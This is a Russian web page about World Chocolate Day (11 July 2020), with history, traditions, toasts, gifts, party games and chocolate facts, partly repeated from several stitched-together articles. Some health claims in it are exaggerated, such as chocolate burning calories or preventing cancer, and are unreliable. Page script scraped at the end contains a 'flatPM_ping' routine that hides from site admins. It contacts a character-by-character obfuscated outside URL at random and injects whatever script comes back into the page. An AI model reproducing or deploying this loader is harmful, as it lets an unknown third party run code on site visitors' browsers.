Когда День шоколада 2020 — 11 июля

Всемирный день шоколада

Дата в 2020 году: 11 июля , суббота

Всемирный день шоколада – праздник, посвященный любимому лакомству многих людей. В торжествах принимают участие сладкоежки и те, чей род деятельность связан с производством или продажей шоколада.

В России в 2020 году Всемирный день шоколада отмечается 11 июля и проходит на неофициальном уровне 26 раз.

К празднику проводят фестивали, ярмарки, мастер классы по изготовлению шоколада.

История праздника

Праздник впервые прошел во Франции в 1995 году. Изначально праздник был задуман, как внутригосударственный, однако вскоре к торжеству присоединились Италия, Швейцария, Германия, Россия и другие страны.

Традиции праздника

В этот день проводятся конкурсы, фестивали, акции и выставки творений из шоколада, приготовления к которым начинаются за 3-5 месяцев до даты праздника. Фабрики и заводы по изготовлению сладостей устраивают экскурсии и дегустации. Все желающие могут попробовать себя в роли шоколатье. Производители шоколада устраивают акции и предоставляют покупателям скидки на свою продукцию. Любители этого лакомства приобретают шоколадные фигурки и сувениры.

В Москве, Санкт-Петербурге и Покрове работают музеи шоколада. Ежегодно 11 июля в них устраиваются массовые гуляния и ярмарки, на которых представлены различные изделия из шоколада. Среди них можно увидеть даже сладкую одежду и предметы быта.

Задание на день

Позвольте себе в этот день насладиться любимым лакомством. Побалуйте себя и своих близких шоколадным десертом.

Тосты

«Поздравляем всех любителей шоколада. С праздником вас, дорогие сладкоежки! Пожелаем вам опробовать как можно больше шоколадного разнообразия от различных умельцев этого знатного продукта и получить истинное и незабываемое наслаждение от этих славных вкусностей».

«Поздравляю с Днем шоколада! Да, повод для праздника весьма необычный, однако шоколад этого заслуживает! Он не только безумно вкусен, но и поднимает настроение! Желаю почаще радовать себя им, самым лучшим, тающим во рту, и радоваться даже тогда, когда шоколада нет под рукой, ведь жизнь так хороша»!

«Поздравляю с Всемирным днем шоколада! В этот праздник всех сладкоежек планеты я желаю тебе шоколадного настроения, сладкой жизни, вкусных подарков и рядом незаменимых друзей, которые всегда готовы принести твои любимые конфеты или помочь их истребить в веселой компании»!

Подарки

Шоколадный сувенир. Шоколадная фигурка станет отличным подарком для сладкоежки. Романтической особе можно преподнести сердце или милую зверушку из шоколада. Изделие в виде мотоцикла, автомобиля или гаечного ключа послужит мужественным презентом.

Набор для фондю. Набор для фондю позволит наслаждаться любимым лакомством в растопленном виде, сочетать его с фруктами или зефиром.

Шоколадный букет. Букет из шоколадных конфет станет необычным и оригинальным сюрпризом для сладкоежки.

Мастер класс. Сертификат на мастер-класс по изготовлению шоколадных конфет послужит интересным презентом, который позволит с пользой и удовольствием провести время.

Конкурсы

Заверни конфетку
Участникам конкурса выдаются шоколадные конфеты или драже и кусочки фольги. По команде ведущего конкурсанты начинают заворачивать конфеты. По истечению времени участники подсчитывают, сколько им удалось завернуть конфет. Побеждает тот, на чьем счету окажется больше готовых изделий.

Шоколадный баскетбол
Участникам конкурса выдается по одинаковому количеству шоколадных конфет, на расстоянии размещаются стаканы или корзинки. Игроки по очереди пытаются забросить конфеты в емкости. Побеждает тот, у кого окажется большее число удачных попаданий. Если у нескольких участников одинаковое количество балов, то проводится дополнительный тур.

Шоколадное равновесие
В конкурсе принимает участие две команды с одинаковым количеством участников. Ведущий обозначает старт и финиш, и выдает каждой команде по плитке шоколада. Участники по очереди должны на голове пронести плитку шоколада от старта до финиша, вернуться обратно и передать эстафету следующему участнику команды. Если игрок роняет плитку, то он возвращается на старт и начинает заново выполнять задание. Побеждает команда, которой удастся быстрее справиться с заданием.

Интересные факты

  • Рецепт изготовления шоколада придумали ацтеки. Они называли его «пищей Богов». В Европу он попал благодаря испанским конкистадорам. Они называли его «черным золотом» и употребляли для укрепления здоровья и повышения выносливости.
  • В Европе до XX столетия шоколад считался деликатесным лакомством. Он был доступен только избранным представителям аристократии.
  • Шоколад считается афродизиаком. Он повышает сексуальную энергию.
  • Первый в мире памятник шоколаду был установлен в городе Покров Владимирской области в 2009 году.
  • Самая шоколадная страна мира – Бельгия. Здесь производится 170 тысяч тонн этого лакомства ежегодно.
  • Ученые установили, что темные сорта шоколада способны стимулировать синтез эндорфинов или «гормонов счастья». Эти вещества воздействуют на центр удовольствия в головном мозге, что позволяет улучшить настроение и повысить тонус организма.

Этот праздник в других странах

Как и в России, Всемирный день шоколада проходит 11 июля во многих странах мира и имеет свои традиции.

В Германии в Европейском парке, который находится в 45 километрах от Баден-Бадена, построена целая страна Шоколандия. Во Всемирный день шоколада здесь устраиваются фестивали, выставки и аттракционы, на которые съезжают туристы со всех уголков Германии и Европы.

В Швейцарии в этот день запускается «шоколадный» поезд, который возит туристов по шоколадным фабрикам.

В Исландии существует традиция разжигать ритуальные костры. Так потомки викингов отдают дань уважения любимому лакомству.

13 сентября в России и многих странах мира проходит аналогичное торжество – Международный день шоколада.

В США существует несколько праздников, посвященных этому лакомству. 28 октября и 13 сентября жители США отмечают Национальные дни шоколада. На 10 января приходится День горького шоколада. 28 февраля проходит День шоколадного суфле, а 2 мая – день шоколадного мусса. 22 июня празднуется День шоколадных эклеров. 18 октября почитают шоколадные капкейки.

Похожие праздники в РФ

24 января в России отмечается Международный день эскимо.

Когда день шоколада в 2020 году – 11 июля

Большинство любителей сладкого знают, что нет на свете ничего вкуснее вкусного шоколада. Скорее всего, Всемирный день шоколада, был придуман именно любителем этого вкуснейшего продукта. Их него можно приготовить и съесть множество вкусностей. Каждый день наши дети пью какао, в него также входит шоколад, а как мы быстро утоляем голод, конечно же, шоколадным батончиком. Вкус этого прекрасного лакомства запоминается на всю жизнь, и когда при каких-то обстоятельствах приходится отказываться от него, это сильно мучает и раздражает, как будто существует небольшая зависимость.

Немного истории

Родился это продукт в южной Америке, и сначала его употребляли в жидком виде, только со временем научились придавать ему густоту и он превратился в шоколад. В те времена, это лакомство было бод большим запретом, и позволить его могли себе только обеспеченные и богатые люди. К нему добавляли разные пряности и добивались непревзойденного вкуса. Подать на десерт шоколад считалось показателем роскоши и достатка. Только короли могли себе позволить наслаждаться его божественным вкусом ежедневно.

Стоимость плитки шоколада была очень высокой, и может быть, поэтому не каждый человек мог себе позволить променять тарелку сытного ужина на бокал вкусного лакомства. Немного позже, когда сахар и какао потеряли свою стоимость и стали иметь приемлемую цену, этот продукт стали изготавливать повсеместно. Добавляя разные ингредиенты, придавая неповторимый вкус.

Со временем добились нужной густоты и стали производить твердый шоколад, уже к 19 веке, можно было найти на прилавках магазинов плитки вкусного шоколада. Они стали занимать особое место среди женщин и детей. Каждый поклонник этого лакомства мог себе позволить приобретать любимый шоколад и наслаждаться его вкусом.

Швейцария стала царицей этого продукта. Именно на ее фабриках стали добавлять орехи и различные специи придавая шоколаду необычный вкус и цвет. Теперь Швейцарский шоколад славится на весь мир и каждый год они не перестают радовать все новыми изобретениями.

В нашей стране это лакомство появилось во времена Екатерины Великой, тогда его привезли в подарок из Америки и он стал очень популярным. Уже после стали перенимать рецепты приготовления и изготавливать свой российский шоколад. Фабрики которые его выпускали, были под контролем того же американца, что впервые привез его. Намного позже достаточно состоятельные люди, которые могли себе позволить покупку заводов и фабрик перекупили некоторые из них и превратили в собственные цеха по изготовлению шоколада. Это был уже наш вкусный отечественный шоколад, на упаковках которого часто изображали знаменитых людей и артистов.

Ах, этот шоколад

Сегодня вся шоколадная промышленность растет и развивается. Этот прекрасный и вкусный продукт можно найти в различных магазинах. Такое разнообразие в выборе, что просто разбегаются глаза. Как и каждого большого предприятия по истечению времени начинают появляться подделки. Шоколад не является исключением и его также очень часто подделывают, прикрываясь известными марками.

Отличить его можно только по вкусу и консистенции. Настоящий горький шоколад имеет довольно высокую цену. Он не растает сразу же в руках, на вид он ровный без пузырьков и сколов и имеет свой неповторимый аромат. Настоящий шоколад дожжен быть не только вкусным, но полезным продуктом. Поэтому производители, которые не добросовестно выполняют свою работу, могут просто напросто навредить здоровью покупателя.

Горький шоколад на сегодняшний день широко используют в косметических средствах по уходу за кожей. Из него делают шоколадное обертывание, которое тонизирует и подтягивает кожу. Также у него масса других полезных назначений. Если его регулярно употреблять, то организм умудряется сохранять свою молодость, и это непросто слова, а доказанный факт. Он повышает работоспособность и увеличивает выдерживание нагрузок.

Считаются, что горький шоколад нужно кушать людям с лишним весом, он помогает отлично сжигать калории. Также он оказывает поддержку сердечнососудистой и кровеносной системам. Положительно он влияет и на настроение человека, благодаря некоторым веществам, которые он содержит, наше настроение значительно увеличивается.

Когда и как празднуют День шоколада

Сладкоежки наверняка знают о Дне шоколада, который ежегодно отмечается в разгар лета – 11 июля. Идея празднования принадлежит французам: они являются большими поклонниками изысканного лакомства. С 1995 г. праздник считался национальным, но со временем и другие страны переняли подобную традицию.

В связи с огромной популярностью подобного мероприятия Всемирный день шоколада стали отмечать четыре раза в году: 2 и 13 сентября, 9 июня и традиционно 11 июля. Американцы, которые дали празднику название World Chocolate Day, посвятили любимому лакомству еще 2 дня: 28 октября и 7 июля. Так что у сладкоежек есть повод отведать шоколад и поучаствовать в занимательных конкурсах и фестивалях целых 6 раз в году.

Как появился шоколад

История шоколада начинается с 1000 г. до н.э., когда аборигены Латинской Америки (племя ольмеков) впервые обратили внимание на плоды шоколадного дерева. Считается, что шоколад – это производное от xocolātl. У древних аборигенов это слово означало «горькая вода». Дело в том, что лакомство изначально употреблялось только в жидком виде, с добавлением жгучего перца и зерен сахарной кукурузы. Какао смешивали с этими необычными ингредиентами, взбивали в воде, пока не появлялась пена, и пили только тогда, когда напиток начинал бродить. Примечательно, что употреблять его разрешалось только вождям. Женщины, дети и простолюдины не имели права прикасаться к божественному нектару. Такие же традиции были у племени майя и у ацтеков. Они даже поклонялись богу какао по имени Эк-Чуах.

Первым европейцем, отведавшим заморское лакомство, стал мореплаватель Колумб. К сожалению, он не смог по достоинству оценить холодный и пряный напиток, поэтому отдал зерна американским индейцам. В Испанию плоды шоколадного дерева попали в XVI веке благодаря Кортесу – конкистадору, который завоевал Мексику. Разгромив ацтеков, он стал обладателем уникальных какао-плантаций и наладил поставки по всей Европе. Испанские монахи и идальго, которые занимались изготовлением десерта, изменили рецептуру, исключив перец и пряности и добавив сахар. Благодаря этому напиток стал сладким и приятным на вкус, к тому же подавался в горячем виде.

В Средневековье десерт был в буквальном смысле на вес золота из-за высоких налогов и трудностей производства. Во Франции с лакомством познакомились благодаря жене Людовика, Анне Австрийской. Англичане и немцы незамедлительно подхватили модную тенденцию. Шоколад стал изысканным десертом для вельмож и высокопоставленных особ, а шоколадные дома вскоре заполонили все улицы Парижа и Лондона.

В 1847 году британский кондитер Фрай сделал революционное открытие: добавил в десерт какао-масло, из-за чего шоколад застыл и затвердел. Так появился первый плиточный шоколад. С середины XIX века новое кондитерское изделие стали производить крупнейшие фабрики мира: английская Cadbury (прославившаяся батончиками Wispa и Picnic), швейцарская Nestle (которая изначально была ориентирована на выпуск искусственных молочных смесей для грудничков), российская «Эйнем» (которая впоследствии была переименована в «Красный октябрь»). На сегодняшний день существует огромное количество как крупных компаний, так и индивидуальных изготовителей продукции hand made. Всемирный день шоколада стал свидетельством популярности этого кондитерского изделия во всем мире и среди всех народов и поколений.

Особенности празднования

Всемирный день шоколада отмечается на всех континентах и практически во всех странах: России, США, Франции, Германии, Испании, Великобритании, Швейцарии и др. В этот день устраиваются забавные и увлекательные конкурсы на поедание сладости, создается уникальный боди-арт посредством нанесения шоколада на тело, принимаются ванны из шоколадного напитка, открываются тематические ярмарки и выставки.

Всемирный день шоколада – отличный повод посетить всемирно известные кондитерские фабрики. Для рекламы своей продукции они проводят интересные экскурсии, чтобы сладкоежки смогли воочию увидеть волшебный процесс создания изысканного лакомства. Можно также посетить познавательные кулинарные мастер-классы и собственноручно изготовить эксклюзивные кондитерские изделия. Почувствовать себя в роли шоколатье можно, продегустировав различные сорта шоколада.

Тем, кому 11 июля посчастливится побывать в Швейцарии, рекомендуется прокатиться на «шоколадном поезде». Во время поездки экскурсовод рассказывает удивительную историю возникновения и развития десерта.

Бельгия славится уникальным музеем шоколада, а немцы создали «Шоколандию» – рай для сладкоежек. Туристам предлагается посетить интересные шоу и поучаствовать в мастер-классах и дегустации.

Российские кондитеры также не отстают от своих иностранных коллег. В 2009 году в Покрове был открыт первый в России памятник шоколаду под названием «Бронзовая фея». Статуя высотой в 3 метра установлена рядом с музеем шоколада. Туристов и посетителей в день празднования ожидает увлекательная шоу-программа и множество интересных конкурсов.

Праздник шоколада – отличный повод поздравить близких и друзей, которые участвуют в создании любимого лакомства: работают на кондитерских фабриках или занимаются дизайном оберток. Необязательно отправляться в Покров или в Европу, организовать досуг можно самостоятельно в семейном кругу. Взрослых можно побаловать шоколадным фондю с ликером, а детей – батончиками, пирожными, мороженым или фруктовыми салатами. В качестве музыкального оформления будут уместны песни отечественных исполнителей на заданную тематику: «Шоколадный заяц» Пьера Нарцисса, «Кофе и шоколад» Инны Маликовой, «Мулатка-шоколадка» Димы Билана. Творческий и креативный подход позволят создать праздничную атмосферу и ввести новую семейную традицию празднования дня любимого лакомства.

Знаете ли вы?

Шоколад является не только вкусным, но и очень полезным десертом. При умеренном употреблении он стабилизирует давление, нормализует работу сердца и оказывает благотворное влияние на нервную систему. Всего одна долька повышает настроение и помогает бороться с депрессией.

Самым полезным считается черный шоколад с высоким содержанием какао-бобов (свыше 70 %). Он улучшает зрение, память, скорость реакции, уменьшает риск инсульта и инфаркта, онкологических заболеваний, укрепляет иммунитет. Ученые доказали, что у людей, употребляющих какао-продукт если не каждый день, то довольно регулярно, риск сердечно-сосудистых заболеваний снижается на 37 %.
Шоколад также является отличным афродизиаком, поскольку повышает либидо. Ощущение таяния во рту погружает человека в продолжительное состояние эйфории, что сравнимо с поцелуем. Благодаря регулярному употреблению этого кондитерского изделия женщины испытывают больше удовлетворенности и влечения, что значительно повышает качество сексуальной жизни.

Шоколад в цифрах

  • Продолжительность жизни шоколадных деревьев – 200 лет, из них всего 25 они плодоносят.
  • В мире существует 300 разновидностей какао-бобов и 400 различных ароматов.
  • Швейцарцы – рекордсмены по поеданию сладости. Каждый из них, согласно статистическим данным, ежегодно съедает 11,8 кг шоколада.
  • Самую большую плитку изготовили англичане. Ее вес составляет 5,8 тонн.

Всемирный день шоколада 2020

Шоколад – это не только очень вкусное, но и полезное лакомство. В отличие от маленьких сладкоежек взрослые знают, что он нормализует давление, стабилизирует работоспособность сердца и оказывает позитивное воздействие на состояние нервной системы, помогая бороться с депрессией. Наибольший индекс пользы имеет горький черный шоколад с содержанием бобов свыше 70%. Его регулярное потребление оградит вас от онкологии, инфаркта, инсульта, поможет улучшить память, зрение и общую концентрацию. Кроме того десерт является отличным афродизиаком для обоих полов.

В 1995 году активисты предложили ввести всемирный день шоколада, который предлагалось праздновать 11 июля. С этого момента он стал пусть неофициальным, но любимым торжеством многих людей.

История возникновения шоколада

Мало кто знает, что шоколадом в древние века называли горький терпкий напиток со специфическим вкусом. Изобрели его в доколумбовой Америке совершенно случайно. Аборигены растерли какао бобы в кашицу и добавили к ним острый тропический перец вместе с пастой из маиса (кукурузы), решив таким образом поэкспериментировать. Все это обильно разбавляли водой и взбивали до образования густой специфической пены. Женщинам и детям забродившее питье давать не разрешалось – им потчевали шаманов, воинов, представителям знати и выбранным для жертвоприношения кандидатам. В начале 16 века напиток попробовал Фернандо Кортес, высадившийся на берег Мексики. Ацтеки, угостившие путешественника, называли его “чоколатль”, то есть “пенная вода”. Название прижилось, слегка поменяв фонетику со временем. Рецепт Кортес увез с собой, фактически подарив Европе знаменитый шоколад.

Спустя несколько лет питье стали подогревать при приготовлении, заметив, что так оно становится вкуснее. Дополнительно стали добавлять орехи, корицу, анис, молоко – в зависимости от предпочтений дегустатора. В Италии открывались целые кафе для любителей “чекулаты”. Мода дошла до Франции, Англии и Нидерландов, постепенно завоевав любовь ценителей терпкого десерта.

В начале 19 века произошла своего рода гастрономическая революция – Конрад Ван Гутен придумал пресс, который позволил перевести шоколад в твердую плитообразную форму. Сын голландского химика получил патент на это изобретение и уже в 1847 году в массовую продажу вышел твердый горький продукт компании “Fry & Sons”. Рецептуру усовершенствовали швейцарцы, который вывели на рынок молочный шоколад. К слову, первопроходцы шоколатье известны всему миру и до сих пор радуют сладкоежек новыми шедеврами – “Nestle” и “Lindt”.

В Россию жидкий шоколад попал во времена правления Екатерины Второй, и варили его как напиток вплоть до середины 19 века. Твердый шоколад в виде конфет и небольших плиток, которые выпускал завод “Красный Октябрь” под руководством Теодора фон Эйнема и Алексея Абрикосова, распространился к рубежу 20 века. В Советском союзе такие сладости считались настоящим деликатесом, дорогостоящим и дефицитным. К 60-м годам руководством СССР было решено сделать шоколад массово доступным – там появилась знаменитая молочная “Аленка” с запоминающимся кремовым вкусом, получившая свое название в честь дочери знаменитой Валентины Терешковой.

Как торжество празднуется в различных странах мира

Всемирный день шоколада – это время организация кондитерских мастер-классов и выставок сладостей. В них принимают участие шоколатье, повара, аматоры своего дела и простые любители десертов. Крупные фабрики устраивают дни открытых дверей для желающих поближе познакомиться с основами производства. Там же проводят дегустацию выпускаемой продукции.

Отличной традицией праздника может стать совместное семейное чаепитие, главным элементом стола которого будут различные виды шоколада и блюд на его основе. Такое мероприятие не оставит равнодушным ни одного сладкоежку.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Всемирный день шоколада в 2020 году:
Яндекс.Метрика